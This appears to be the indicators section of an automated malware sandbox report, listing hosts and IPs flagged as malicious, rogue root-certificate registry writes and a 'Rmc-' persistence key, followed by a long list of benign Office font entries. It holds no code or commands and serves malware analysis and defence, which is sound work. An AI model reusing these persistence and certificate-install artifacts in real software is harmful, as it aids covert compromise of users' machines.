IP
Malicious
ia803104.us.archive.org
207.241.232.154
 malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
137.184.234.91
unknown
United States
malicious
207.241.232.154
ia803104.us.archive.org
United States
malicious
45.90.89.98
unknown
Bulgaria
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Rmc-O0U3JA
exepath
 malicious
HKEY_CURRENT_USER\Software\Rmc-O0U3JA
licence
 malicious
HKEY_CURRENT_USER\Software\Rmc-O0U3JA
time
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
#:/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
h;/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
+=/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2847B
2847B
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
ProductNonBootFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
